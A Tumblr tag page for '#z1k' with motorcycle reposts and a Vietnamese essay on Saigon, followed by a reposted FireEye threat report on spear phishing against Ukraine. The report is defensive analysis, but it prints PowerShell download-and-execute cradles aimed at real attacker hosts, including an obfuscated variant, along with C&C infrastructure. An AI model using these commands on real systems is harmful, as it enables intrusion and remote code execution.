#z1k
Explore tagged Tumblr posts
Text
0 notes
Photo
Population engineering in Türkiye's irredentist (istirdat) process - Murat Kanatlı
0 notes
Photo
#Repost @colombiamotos ・・・ Kawasaki z1000🔥 Follow @colombiamotos for more! @vendetumoto.co ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ ▶️ Follow @bikeraholic ◀️ ▶️ Follow @cartelbaggers ◀️ ______________________________ www.facebook.com/BikerAholic www.Twitter.com/BikerAholic _______________________________ 📸 Tag your pics and videos with ▶️ @bikeraholic #bikeraholic ◀️ for a chance to be featured. ✌🏻️🏍 ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ #colombiamotos #motorcycles #cali #calicolombia #z1000 #z1k #kawasaki #kawasakicolombia #kawasakiz1000 #shiftlife #Girlsthatride #BikeLife #bikerchick #bikergirlsofinstagram #bikersofinstagram #girlsthatridemotorcycle #babe #bikeporn https://www.instagram.com/p/BoDV7n3gTNQ/?utm_source=ig_tumblr_share&igshid=8jvp6lqnf2fh
#repost#bikeraholic#colombiamotos#motorcycles#cali#calicolombia#z1000#z1k#kawasaki#kawasakicolombia#kawasakiz1000#shiftlife#girlsthatride#bikelife#bikerchick#bikergirlsofinstagram#bikersofinstagram#girlsthatridemotorcycle#babe#bikeporn
9 notes
Photo
#zara #z1k #z1000 (at Agnes Banks Produce) https://www.instagram.com/p/CjMwLjIL8LT/?igshid=NGJjMDIxMWI=
0 notes
Photo
Ready to Rescue @motoaid 017-4387101 / 016-3778183 #futuristicbike #z1k #z1000 #kawasakiz1000 #faster #malayabikers #kawasakiz1000 #respect #motorrescue #biketowing (at Semua bisa) https://www.instagram.com/p/CLo_axNpuuP/?igshid=y3n8vlu4osxm
0 notes
Photo
#Repost @stark_steven • • • • • • #swissbiker #xlitehelmet #z1000 #kawasakiz1000 #teamkawasaki #z1k #kawasakiz #nakedbikes #xlite #kawasakiteam #kawasakilife #kawasakidaily #kawasakiznation #kawasakizclub #kawasakischweiz #kawasakiracing #bikersnetwork #kawasakiz900 #kawasakiz750 #nakedbike #kawasakiz800 #daineseofficial #streetaddict #superbikers #nakedbikenation ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ Edit by me 🎨 Behind the Camera 📸 @captain.mara ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ Follow @gp.canada For Bikes Leather Outfit, Gloves and Boots https://bit.ly/2V36bqA follow @gp.canada For Biker outfit : https://bit.ly/2V36bqA https://www.instagram.com/p/CCnAcJDnRpm/?igshid=gzg7cskr8b51
#repost#swissbiker#xlitehelmet#z1000#kawasakiz1000#teamkawasaki#z1k#kawasakiz#nakedbikes#xlite#kawasakiteam#kawasakilife#kawasakidaily#kawasakiznation#kawasakizclub#kawasakischweiz#kawasakiracing#bikersnetwork#kawasakiz900#kawasakiz750#nakedbike#kawasakiz800#daineseofficial#streetaddict#superbikers#nakedbikenation
0 notes
Text
https://www.youtube.com/watch?v=RMjMs28-Z1k
My sister had to make a video for school. I had to help. This is peak comedy.
1 note
Photo
In honor of the great Martin Luther King! 🙏🏼🙏🏼🙏🏼 (at Christophe Choo Real Estate Group - Coldwell Banker Global Luxury) https://www.instagram.com/p/B7jI4O3B2XNczBURi1UQc_dUfs8J-Z1k-1taHU0/?igshid=jf4vxmgoxa8y
0 notes
Note
Super risky 3 & 10
3. the last text you sent to someone?-I sent my friend this https://youtu.be/tQX-Z1k-v54
10. if you draw or write, show some of your really old work- I barely draw or write honestly. The few drawings I have are shitty and on my laptop currently. The oldest shit I've written was years ago and I sent them via email to a friend all the time 😂
2 notes
Photo
#Repost @z1000_oficial • • • • • • "Wanting is the first step toward achieving our dreams." 💪🏼😁🙏🏻 @silvandroe ➖➖➖➖➖➖➖➖➖➖➖➖ Want stickers? Contact me in DM! #motard #bike#z650#kawasaki#z800#z1000r#z1000_oficial#Honda#yamaha#ktm#z1k#speed #z1000#alpinestars#dainese#shoei#arai#agv#ls2 #querly#grenzgaenger #monster#akrapovic#superbikes #bmw#streetfighter#superbike #z900#Suzuki Follow @gp.canada For Bikes Leather Outfit, Gloves and Boots https://bit.ly/2V36bqA follow @gp.canada For Biker outfit : https://bit.ly/2V36bqA https://www.instagram.com/p/CB8ZuAzH7ZT/?igshid=xz0dm46sf82v
#repost#motard#bike#z650#kawasaki#z800#z1000r#z1000_oficial#honda#yamaha#ktm#z1k#speed#z1000#alpinestars#dainese#shoei#arai#agv#ls2#querly#grenzgaenger#monster#akrapovic#superbikes#bmw#streetfighter#superbike#z900#suzuki
0 notes
Video
at Jeddah, Saudi Arabia https://www.instagram.com/p/B-2zHoQJ8-Tc-U3Dw0trOhbD3CQkPZFn-z1K-o0/?igshid=19d67ub7uxtsm
0 notes
Text
Spaceshare: Saigon, a den that takes in everyone?
Saigon is just a place for me to make money, that's all.
It's huge, more than 2,000 square kilometres, no small thing; what kind of place runs from the sea at Cần Giờ all the way up to the orchards of Củ Chi and on to the cattle-farming area of District... ah, never mind.
It's crowded. Can't make a living back home... go up to Saigon. Need some kind of work... go to Saigon. Sitting the university exams... in Saigon. Two kids in love whose families object run away from home... to Saigon. No land left to work back home... go to Saigon and work. Bored at home in the countryside... head to Saigon for fun.
So in the end Saigon is like a den that takes everyone in; the only thing missing is people catching a bus into Saigon just to á* and then heading home. It's close to 12 million people now, and I've never seen it expel anyone or chase anyone off; people go from rags to fame and turn their backs on Saigon, but I've never seen Saigon turn its back on anyone.
Say what you will, but if you can't make it here any more... you're pretty hopeless, you know.
Whether you were born, raised, schooled and employed here or came up from the provinces doesn't matter one bit, as long as you're willing to live. Know why I say that?
Try it on a day off: make the effort to get up early, around 4:30 or 5 in the morning, and take your bike out while more than half the people in this city are still fast asleep and the rest, of course, have been up since before dawn to earn their rice and clothes. It's not hard to spot the aunties and older sisters bustling around a stove, a few tables and chairs, fussing with piles of bowls, chopsticks, spoons, lime wedges and chillies... setting up to sell breakfast to the folks heading to work early, and the motorbike-taxi uncles parked at the red lights at the intersections, legs crossed, nursing a coffee and a cigarette to stay sharp so they're awake enough to ride when a fare turns up out of nowhere.
Then the scariest are the guys delivering bread and ice early in the morning; they ride like they're running for president. Run into one of them as soon as you hit the road and you'll be wide awake for sure, because their bikes carry exhausts that sound like the engines of big-displacement machines, say a z1k, a cb11k, a Ducati 800, ...
Honestly, sometimes their bikes are already out at the Saigon Bridge and you can still hear them echoing from the Hàng Xanh intersection; live here long enough and you'll learn the saying "first ice, second gas, third bread". Scary, but you can't help loving them, right?
And you have to love the morning newspaper guys, cruising along slowly, slowly... slowly reaching house number xyz and remembering that this fellow reads Báo Pháp Luật, the lady who runs the grocery takes Báo Phụ Nữ, the guy who always looks grumpy gets Báo Công An, ... and so on and so forth...
Stopped at some intersection in the early light, you can easily "spot" the still-sleepy faces of the kids riding behind their parents, one eye open and one shut while waiting through a 60-second red light, the most satisfying yawns, and somewhere a kid on the back with one arm around dad's waist and the other hand hurriedly gnawing a bánh mì before reaching the school gate, and plenty more...
==>> Read more at: http://pacesharevn.com/spaceshare-sai-gon-nhu-cai-dong-chua/
0 notes
Text
Spear Phishing Campaign Targets Ukraine Government and Military; Infrastructure Reveals Potential Link to So-Called Luhansk People's Republic
Original Post from FireEye
Author: John Hultquist
In early 2019, FireEye Threat Intelligence identified a spear
phishing email targeting government entities in Ukraine. The spear
phishing email included a malicious LNK file with PowerShell script to
download the second-stage payload from the command and control
(C&C) server. The email was received by military departments in
Ukraine and included lure content related to the sale of demining machines.
This latest activity is a continuation of spear phishing that
targeted the Ukrainian Government as early as 2014. The email is
linked to activity that previously targeted the Ukrainian Government
with RATVERMIN. Infrastructure analysis indicates the actors behind
the intrusion activity may be associated with the so-called Luhansk
People’s Republic (LPR).
The spear phishing email, sent on Jan. 22, 2019, used the subject
“SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD,” and the sender
was forged as Armtrac, a defense manufacturer in the United Kingdom
(Figure 1).
Figure 1: The spear phishing email
The email included an attachment with the filename
“Armtrac-Commercial.7z” (MD5:
982565e80981ce13c48e0147fb271fe5). This 7z package contained
“Armtrac-Commercial.zip” (MD5:
e92d01d9b1a783a23477e182914b2454) with two benign Armtrac documents
and one malicious LNK file with a substituted icon (Figure 2).
Figure 2: LNK with substituted icon
Armtrac-20T-with-Equipment-35078.pdf (MD5:
0d6a46eb0d0148aafb34e287fcafa68f) is a benign document from the official
Armtrac website.
SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf (MD5:
bace12f3be3d825c6339247f4bd73115) is a benign document from the official
Armtrac website.
SPEC-10T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf.lnk (MD5:
ec0fb9d17ec77ad05f9a69879327e2f9) is a malicious LNK file that
executes a PowerShell script. Interestingly, while the LNK file used
a forged extension to impersonate a PDF document, the icon was
replaced with a Microsoft Word document icon.
Sponsor Potentially Active Since 2014
Compilation times indicate that this actor, who focused primarily on
Ukraine, may have been active since at least 2014. Their activity was
first reported by FireEye Threat Intelligence in early 2018. They
gradually increased in sophistication and leveraged both custom and
open-source malware.
The 2018 campaign used standalone EXE or self-extracting RAR (SFX)
files to infect victims. However, their recent activity showed
increased sophistication by leveraging malicious LNK files. The group
used open-source QUASARRAT and the RATVERMIN malware, which we have
not seen used by any other groups. Domain resolutions and malware
compile times suggest this group may have been active as early as
2014. Filenames and malware distribution data suggest the group is
primarily focused on targeting Ukrainian entities.
Association With So-Called Luhansk People’s Republic
FireEye Threat Intelligence analysis uncovered several indications
that the actors behind this activity have ties to the breakaway
so-called Luhansk People’s Republic (LPR).
Registrant Overlap with Official So-Called LPR Website
Infrastructure analysis suggests these operators are linked to the
so-called LPR and the persona "re2a1er1." The domain used as
C&C by the LNK file described above (sinoptik[.]website) was registered
under the email "[email protected]." The same email address also
registered the following domains.
| Domain registered by [email protected] | Possible mimicked domain | Description | Possible targeted country |
|---|---|---|---|
| 24ua[.]website | 24tv.ua | A large news portal in Ukraine | UA |
| censor[.]website | censor.net.ua | A large news portal in Ukraine | UA |
| fakty[.]website | fakty.ua | A large news portal in Ukraine | UA |
| groysman[.]host | Volodymyr Borysovych Groysman | V. B. Groysman is a politician who has been Prime Minister of Ukraine since April 14, 2016 | UA |
| gordon.co[.]ua | gordonua.com | A large news portal in Ukraine | UA |
| mailukr[.]net | ukr.net | A large mail service in Ukraine | UA |
| me.co[.]ua | me.gov.ua | Ukraine's Ministry of Economic Development and Trade | UA |
| novaposhta[.]website | novaposhta.ua | Ukraine's largest logistics services company | UA |
| olx[.]website | olx.ua | Ukraine's largest online ad platform | UA |
| onlineua[.]website | online.ua | A large news portal in Ukraine | UA |
| rst[.]website | rst.ua | One of the largest car sales websites in Ukraine | UA |
| satv[.]pw | Unknown | TV-related | UA |
| sinoptik[.]website | sinoptik.ua | The largest weather website in Ukraine | UA |
| spectator[.]website | spectator.co.uk | A large news portal in the UK | UK |
| tv.co[.]ua | Unknown | TV-related | UA |
| uatoday[.]website | uatoday.news | A large news portal in Ukraine | UA |
| ukrposhta[.]website | ukrposhta.ua | State Post of Ukraine | UA |
| unian[.]pw | unian.net | A large news portal in Ukraine | Unknown |
| vj2[.]pw | Unknown | Unknown | UA |
| xn--90adzbis.xn--c1avg | Not applicable | Punycode of the website of the Ministry of State Security of the so-called Luhansk People's Republic | UA |
| z1k[.]pw | zik.ua | A large news portal in Ukraine | UA |
| milnews[.]info | Unknown | Military news | UA |
Table 1: Related infrastructure
One of the domains, "xn--90adzbis.xn--c1avg", is the Punycode form
of "мгблнр.орг," the official website of the Ministry of State
Security of the so-called LPR (Figure 3). Ukrainian legislation
describes the so-called LPR as "temporarily occupied territory" and
its government as an "occupying administration of the Russian
Federation."
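Table 1 is the product of a registrant pivot followed by a lookalike comparison done by eye. As an added example, not FireEye code, the Python below reruns that comparison mechanically over the Table 1 domains: it decodes Punycode labels so мгблнр.орг is readable, strips the public suffix to recover the label the registrant chose, normalises digit-for-letter swaps such as z1k versus zik, and reports which of the "possible mimicked domains" each suspect resembles. The suffix list, the homoglyph map and the matching thresholds are my assumptions; a production tool would use the Public Suffix List and a fuller confusable table.

```python
# Added example (not FireEye's code): the registrant/lookalike pivot behind
# Table 1, written so it can be rerun on a fresh domain set. Suspect domains
# are the Table 1 entries with the [.] defanging removed; the "legitimate"
# list is the post's "Possible Mimicked Domains" column.

# Two-label public suffixes present in the data. Assumption: a hand-kept
# list is enough here; a real tool would consult the Public Suffix List.
TWO_LABEL_SUFFIXES = ("co.ua", "net.ua", "gov.ua", "com.ua", "co.uk")

# Digit-for-letter substitutions that survive a casual glance (z1k vs zik).
HOMOGLYPHS = str.maketrans({"1": "i", "0": "o", "3": "e", "5": "s"})

SUSPECT_DOMAINS = [
    "24ua.website", "censor.website", "fakty.website", "groysman.host",
    "gordon.co.ua", "mailukr.net", "me.co.ua", "novaposhta.website",
    "olx.website", "onlineua.website", "rst.website", "satv.pw",
    "sinoptik.website", "spectator.website", "tv.co.ua", "uatoday.website",
    "ukrposhta.website", "unian.pw", "vj2.pw", "xn--90adzbis.xn--c1avg",
    "z1k.pw", "milnews.info",
]
LEGIT_DOMAINS = [
    "24tv.ua", "censor.net.ua", "fakty.ua", "gordonua.com", "ukr.net",
    "me.gov.ua", "novaposhta.ua", "olx.ua", "online.ua", "rst.ua",
    "sinoptik.ua", "spectator.co.uk", "uatoday.news", "ukrposhta.ua",
    "unian.net", "zik.ua",
]


def decode_idn(domain):
    """Turn xn-- labels back into Unicode so Cyrillic names are readable."""
    out = []
    for label in domain.lower().split("."):
        if label.startswith("xn--"):
            label = label[4:].encode("ascii").decode("punycode")
        out.append(label)
    return ".".join(out)


def core_label(domain):
    """The label the registrant chose: the one just left of the public suffix."""
    name = decode_idn(domain)
    for suffix in TWO_LABEL_SUFFIXES:
        if name.endswith("." + suffix):
            name = name[: -len(suffix) - 1]
            break
    else:
        name = name.rsplit(".", 1)[0]
    return name.rsplit(".", 1)[-1]  # drop any leading labels such as www


def edit_distance(a, b):
    """Levenshtein distance by plain dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalikes(suspect, legit_domains):
    """Legitimate domains the suspect appears to imitate, in list order."""
    s = core_label(suspect).translate(HOMOGLYPHS)
    hits = []
    for legit in legit_domains:
        l = core_label(legit).translate(HOMOGLYPHS)
        if (s == l
                or (len(l) >= 3 and l in s)        # mailukr contains ukr
                or (len(s) >= 4 and s in l)        # gordon inside gordonua
                or (len(l) >= 4 and edit_distance(s, l) <= 1)):
            hits.append(legit)
    return hits


def pivot(suspects, legit_domains):
    """Map each suspect domain to its decoded form and the brands it mimics."""
    return {d: {"decoded": decode_idn(d), "mimics": lookalikes(d, legit_domains)}
            for d in suspects}


if __name__ == "__main__":
    for domain, info in pivot(SUSPECT_DOMAINS, LEGIT_DOMAINS).items():
        print(f"{domain:26} {info['decoded']:22} -> {', '.join(info['mimics']) or '-'}")
```

Run stand-alone it prints one line per domain. It is deliberately conservative: 24ua[.]website is not paired with 24tv.ua (two substitutions apart), while ukrposhta[.]website matches both ukr.net and ukrposhta.ua, so treat the output as a triage aid for the analyst rather than a verdict.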
Figure 3: Official website of the
Ministry of State Security of the So-Called Luhansk People’s
Republic (МГБ ЛНР – Министерство Государственной Безопасности
Луганской Народной Республики)
Conclusions
This actor has likely been active since at least 2014, and its
continuous targeting of the Ukrainian Government suggests a cyber
espionage motivation. This is supported by the ties to the so-called
LPR’s security service. While more evidence is needed for definitive
attribution, this activity showcases the accessibility of competent
cyber espionage capabilities, even to sub-state actors. While this
specific group is primarily a threat to Ukraine, nascent threats to
Ukraine have previously become international concerns and bear monitoring.
Technical Annex
The LNK file (SPEC-10T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf.lnk
[MD5: ec0fb9d17ec77ad05f9a69879327e2f9]) carries the following target
(Figure 4), which launches PowerShell with a Base64-encoded script via
the -e (EncodedCommand) switch:
vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -e """"aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgAGgAdAB0AHAAOgAvAC8AcwBpAG4AbwBwAHQAaQBrAC4AdwBlAGIAcwBpAHQAZQAvAEUAdQBjAHoAUwBjACkAIAA="""""", 0 : window.close")
Figure 4: LNK file script
Decoding the Base64 string (it is UTF-16LE text, as -e expects) yields
the following command (Figure 5):
vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -e iex(iwr -useb http://sinoptik[.]website/EuczSc)"", 0 : window.close")
Figure 5: LNK file command
The PowerShell script fetches "http://sinoptik[.]website/EuczSc" with
Invoke-WebRequest and passes the response straight to Invoke-Expression.
Unfortunately, the server was unreachable during analysis, so the
second-stage payload could not be retrieved.
Network Infrastructure Linked to Attackers
The passive DNS records of the C&C domain "sinoptik[.]website" include the following IPs:
| Host/Domain Name | First Seen | IP |
|---|---|---|
| sinoptik[.]website | 2018-09-17 | 78.140.167.89 |
| sinoptik[.]website | 2018-06-08 | 78.140.164.221 |
| sinoptik[.]website | 2018-03-16 | 185.125.46.158 |
| http://www.sinoptik[.]website | 2019-01-17 | 78.140.167.89 |
Table 2: Network infrastructure linked to attackers
Domains previously connected to RATVERMIN (aka VERMIN) and QUASARRAT
(aka QUASAR) also resolved to IP “185.125.46.158” and
include the following:
| Malware MD5 | C&C | Malware Family |
|---|---|---|
| 47161360b84388d1c254eb68ad3d6dfa | akamainet022[.]info | QUASARRAT |
| 242f0ab53ac5d194af091296517ec10a | notifymail[.]ru | RATVERMIN |
| 07633a79d28bb8b4ef8a6283b881be0e | akamainet066[.]info | QUASARRAT |
| 5feae6cb9915c6378c4bb68740557d0a | akamainet024[.]info | RATVERMIN |
| dc0ab74129a4be18d823b71a54b0cab0 | akamaicdn[.]ru | QUASARRAT |
| bbcce9c91489eef00b48841015bb36c1 | cdnakamai[.]ru | QUASARRAT |
Table 3: Additional malware linked to the attackers
RATVERMIN is a .NET backdoor that FireEye Threat Intelligence
started tracking in March 2018. It has also been reported in public
reports and blog posts.
Operators Highly Aggressive, Proactive
The actor is highly interactive with its tools and has responded
within a couple of hours of receiving a new victim, demonstrating its
ability to react quickly. An example of this hands-on style of
operation occurred during live malware analysis. RATVERMIN operators
observed that the malware was running from an unintended target at
approximately 1700 GMT (12:00 PM Eastern Standard Time on a weekday)
and promptly executed the publicly available Hidden Tear ransomware
(saved to disk as hell0.exe, MD5: 8ff9bf73e23ce2c31e65874b34c54eac).
The ransomware process was killed before it could execute
successfully. If the Hidden Tear continued execution, a file would
have been left on the desktop with the following message:
“Files have been encrypted with hidden tear. Send me some
bitcoins or kebab. And I also hate night clubs, desserts, being drunk.”
When live analysis resumed, the threat group behind the attack
started deleting all the analysis tools on the machine. Upon resetting
the machine and executing the malware again, this time with a text
file open asking why they sent ransomware, the threat group responded
by sending the following message via RATVERMIN’s C&C domain
(Figure 6):
C&C to Victim
HTTP/1.1 200 OK
Content-Length: 5203
Content-Type: multipart/related; type="application/xop+xml";start="";boundary="uuid:67761605-5c90-47ac-bcd8-718a09548d60+id=14";start-info="application/soap+xml"
Server: Microsoft-HTTPAPI/2.0
MIME-Version: 1.0
Date: Tue, 20 Mar 2018 19:01:26 GMT

--uuid:67761605-5c90-47ac-bcd8-718a09548d60+id=14
Content-ID:
Content-Transfer-Encoding: 8bit
Content-Type: application/xop+xml;charset=utf-8;type="application/soap+xml"

Mad ?
Figure 6: RATVERMIN’s C&C domain message
Related Samples
Further research uncovered additional LNK files with PowerShell
scripts that connect to the same C&C server.
Filename: Висновки. S021000262_1901141812000. Scancopy_0003. HP LaserJet Enterprise 700 M775dn(CC522A).docx.lnk (Ukrainian translation: Conclusions)
MD5: fe198e90813c5ee1cfd95edce5241e25
Description: LNK file that also carries the substituted Microsoft Word document icon and sends a request to the same C&C domain
C&C: http://sinoptik[.]website/OxslV6
PowerShell activity (Command Line Arguments):
vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell.exe -c iex(iwr -useb http://sinoptik[.]website/OxslV6)"", 0 : window.close")
Figure 7: Additional LNK files with PowerShell scripts
Filename: КМУ база даних.zip (Ukrainian translation: Cabinet of Ministers of Ukraine database)
MD5: a5300dc3e19f0f0b919de5cda4aeb71c
Description: ZIP archive containing a malicious LNK file
Filename: Додаток.pdf (Ukrainian translation: Attachment)
MD5: a40fb835a54925aea12ffaa0d76f4ca7
Description: Benign decoy document
Filename: КМУ_база_даних_органи_упр,_СГ_КМУ.rtf.lnk
MD5: 4b8aac0649c3a846c24f93dc670bb1ef
Description: Malicious LNK that executes a PowerShell script
C&C: http://cdn1186[.]site/zG4roJ
PowerShell activity (Command Line Arguments):
powershell.exe -NoP -NonI -W hidden -Com "$cx=New-Object -ComObject MsXml2.ServerXmlHttp;$cx.Open('GET','http://cdn1186[.]site/zG4roJ',$False);$cx.Send(); $cx.ResponseText|.( ''.Remove.ToString()[14,50,27]-Join'')"
!%SystemRoot%\system32\shell32.dll
This variant swaps iwr for an MsXml2.ServerXmlHttp COM request and hides the Invoke-Expression: ''.Remove.ToString() returns the overload signatures of String.Remove, and characters 14, 50 and 27 of that text are the letters i, e and x, which are joined into "iex" and invoked with the call operator on the downloaded response.
Figure 8: Additional LNK files with PowerShell scripts
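When the second stage cannot be recovered, the cradles in Figures 4, 5, 7 and 8 are all an analyst gets, so the decode-and-extract step in the Technical Annex is worth automating. The Python below is an added example and not FireEye tooling: it takes the three LNK command lines from Figures 4, 7 and 8 (copied here with the [.] defanging removed so the URLs parse), decodes a -EncodedCommand blob if one is present (Base64 over UTF-16LE, whitespace tolerated), classifies the download cradle and returns every URL re-defanged in the post's hxxp/[.] style. The function names, the cradle labels and the regular expressions are mine.

```python
import base64
import re

# Added example, not FireEye's code. Command lines are constructed from
# Figures 4, 7 and 8 of the post; the Figure 4 Base64 blob keeps the line
# breaks the page layout introduced, which the decoder must tolerate.
FIG4_LNK_COMMAND = r'''vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -e """"aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgAGgAdAB0AHAAOgAvAC8AcwBpAG4Ab
wBwAH
QAaQBrAC4AdwBlAGIAcwBpAHQAZQAvAEUAdQBjAHoAUwBjACkAIAA="""""", 0 : window.close")'''

FIG7_LNK_COMMAND = r'''vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell.exe -c iex(iwr -useb http://sinoptik.website/OxslV6)"", 0 : window.close")'''

FIG8_LNK_COMMAND = r'''powershell.exe -NoP -NonI -W hidden -Com "$cx=New-Object -ComObject MsXml2.ServerXmlHttp;$cx.Open('GET','http://cdn1186.site/zG4roJ',$False);$cx.Send(); $cx.ResponseText|.( ''.Remove.ToString()[14,50,27]-Join'')"'''

# Any unique prefix of -EncodedCommand (-e, -ec, -enc, ...), optional quoting,
# then a Base64 blob that may contain whitespace. The blob ends at a quote,
# a comma, end of string, or whitespace followed by the next -switch.
ENCODED_ARG = re.compile(
    r"(?<!\S)-e[a-z]*\s+[\"']*([A-Za-z0-9+/=\s]+?)(?=[\"',]|\s*$|\s+-)", re.I)
URL = re.compile(r"https?://[^\s\"')<>]+")


def defang(url):
    """hxxp://host[.]tld/path, the convention used throughout the post."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


def decode_encoded_command(blob):
    """PowerShell -EncodedCommand is Base64 over UTF-16LE text, not UTF-8."""
    return base64.b64decode(re.sub(r"\s+", "", blob)).decode("utf-16-le")


def triage_command(cmd):
    """Return (cradle kind, defanged script text, defanged URLs) for one command line."""
    m = ENCODED_ARG.search(cmd)
    script = decode_encoded_command(m.group(1)) if m else cmd
    if m:
        kind = "encoded-command"
    elif re.search(r"\b(iwr|Invoke-WebRequest)\b", script, re.I):
        kind = "iex-iwr"
    elif "MsXml2.ServerXmlHttp" in script:
        kind = "msxml2-serverxmlhttp"
    else:
        kind = "unknown"
    urls = [defang(u) for u in URL.findall(script)]
    return kind, URL.sub(lambda u: defang(u.group(0)), script), urls


if __name__ == "__main__":
    for name, cmd in (("Figure 4", FIG4_LNK_COMMAND),
                      ("Figure 7", FIG7_LNK_COMMAND),
                      ("Figure 8", FIG8_LNK_COMMAND)):
        kind, script, urls = triage_command(cmd)
        print(f"{name}: {kind}: {urls}")
        print("  ", script.strip())
```

Nothing here executes the cradle: the Figure 8 URL is pulled out of the $cx.Open call by pattern, and the obfuscated iex stage is never evaluated. The kind labels are only triage tags; the URLs and the decoded text are what go into a ticket or a blocklist.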
FireEye Detection
FireEye detection names for the indicators in the attack include the following:
FireEye Endpoint Security
INVOKE CRADLECRAFTER (UTILITY)
MALICIOUS SCRIPT CONTENT A (METHODOLOGY)
MSHTA.EXE SUSPICIOUS COMMAND LINE SCRIPTING (METHODOLOGY)
OFFICE CLIENT SUSPICIOUS CHILD PROCESS (METHODOLOGY)
PERSISTENT MSHTA.EXE PROCESS EXECUTION (METHODOLOGY)
POWERSHELL.EXE EXECUTION ARGUMENT OBFUSCATION (METHODOLOGY)
POWERSHELL.EXE IEX ENCODED COMMAND (METHODOLOGY)
SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
FireEye Network Security
86300142_Backdoor.Win.QUASARRAT
86300140_Backdoor.Win.QUASARRAT
86300141_Backdoor.Win.QUASARRAT
Malware.archive
FE_Backdoor_MSIL_RATVERMIN_1
33340392_Backdoor.Win.RATVERMIN
33340391_Backdoor.Win.RATVERMIN
FireEye Email Security
FE_MSIL_Crypter
FE_Backdoor_MSIL_RATVERMIN_1
Malware.Binary.lnk
Malware.Binary.exe
Malware.archive
Backdoor.Win.QUASARRAT
Backdoor.Win.RATVERMIN
CustomPolicy.MVX.exe
CustomPolicy.MVX.65003.ExecutableDeliveredByEmail
Summary of Indicators
Malicious package and LNK files
982565e80981ce13c48e0147fb271fe5
e92d01d9b1a783a23477e182914b2454
ec0fb9d17ec77ad05f9a69879327e2f9
fe198e90813c5ee1cfd95edce5241e25
a5300dc3e19f0f0b919de5cda4aeb71c
4b8aac0649c3a846c24f93dc670bb1ef
Related Files
0d6a46eb0d0148aafb34e287fcafa68f (decoy document)
bace12f3be3d825c6339247f4bd73115 (decoy document)
a40fb835a54925aea12ffaa0d76f4ca7 (decoy document)
Quasar RAT Samples
50b1f0391995a0ce5c2d937e880b93ee
47161360b84388d1c254eb68ad3d6dfa
07633a79d28bb8b4ef8a6283b881be0e
dc0ab74129a4be18d823b71a54b0cab0
bbcce9c91489eef00b48841015bb36c1
3ddc543facdc43dc5b1bdfa110fcffa3
5b5060ebb405140f87a1bb65e06c9e29
80b3d1c12fb6aaedc59ce4323b0850fe
d2c6e6b0fbe37685ddb865cf6b523d8c
dca799ab332b1d6b599d909e17d2574c
RATVERMIN
242f0ab53ac5d194af091296517ec10a
5feae6cb9915c6378c4bb68740557d0a
5e974179f8ef661a64d8351e6df53104
0b85887358fb335ad0dd7ccbc2d64bb4
9f88187d774cc9eaf89dc65479c4302d
632d08020499a6b5ee4852ecadc79f2e
47cfac75d2158bf513bcd1ed5e3dd58c
8d8a84790c774adf4c677d2238999eb5
860b8735995df9e2de2126d3b8978dbf
987826a19f7789912015bb2e9297f38b
a012aa7f0863afbb7947b47bbaba642e
a6ecfb897ca270dd3516992386349123
7e2f581f61b9c7c71518fea601d3eeb3
b5a6aef6286dd4222c74257d2f44c4a5
0f34508772ac35b9ca8120173c14d5f0 (RATVERMIN's keylogger)
86d2493a14376fbc007a55295ef93500 (RATVERMIN's encryption tool)
04f1aa35525a44dcaf51d8790d1ca8a0 (RATVERMIN helper functions)
634d2a8181d08d5233ca696bb5a9070d (RATVERMIN helper functions)
d20ec4fdfc7bbf5356b0646e855eb250 (RATVERMIN helper functions)
5ba785aeb20218ec89175f8aaf2e5809 (RATVERMIN helper functions)
b2cf610ba67edabb62ef956b5e177d3a (RATVERMIN helper functions)
7e30836458eaad48bf57dc1decc27d09 (RATVERMIN helper functions)
df3e16f200eceeade184d6310a24c3f4 (RATVERMIN crypt functions)
86d2493a14376fbc007a55295ef93500 (RATVERMIN crypt functions)
d72448fd432f945bbccc39633757f254 (RATVERMIN task scheduler tool)
e8e954e4b01e93f10cefd57fce76de25 (RATVERMIN task scheduler tool)
Hidden Tear Ransomware
8ff9bf73e23ce2c31e65874b34c54eac
Malicious Infrastructure
akamainet022[.]info
akamainet066[.]info
akamainet024[.]info
akamainet023[.]info
akamainet021[.]info
http://www.akamainet066[.]info
http://www.akamainet023[.]info
http://www.akamainet022[.]info
http://www.akamainet021[.]info
akamaicdn[.]ru
cdnakamai[.]ru
mailukr[.]net
notifymail[.]ru
http://www.notifymail[.]ru
tech-adobe.dyndns[.]biz
sinoptik[.]website
cdn1186[.]site
news24ua[.]info
http://sinoptik%5B.%5Dwebsite/EuczSc
http://sinoptik%5B.%5Dwebsite/OxslV6
http://cdn1186%5B.%5Dsite/zG4roJ
206.54.179.196
195.78.105.23
185.125.46.24
185.158.153.222
188.227.16.73
212.116.121.46
185.125.46.158
94.158.46.251
188.227.75.189
Correlated Infrastructure
78.140.167.89 (pdns)
1ua[.]eu (pdns)
24ua[.]website (pdns, registered by [email protected])
cdn1214[.]site (pdns)
censor[.]website (pdns, registered by [email protected])
fakty[.]website (pdns, registered by [email protected])
gismeteo[.]website (pdns, registered by [email protected])
lmeta[.]eu (pdns)
me.co[.]ua (pdns, registered by [email protected])
milnews[.]info (pdns)
mj2[.]pw (pdns, registered by [email protected])
novaposhta[.]website (pdns, registered by [email protected])
olx[.]website (pdns, registered by [email protected])
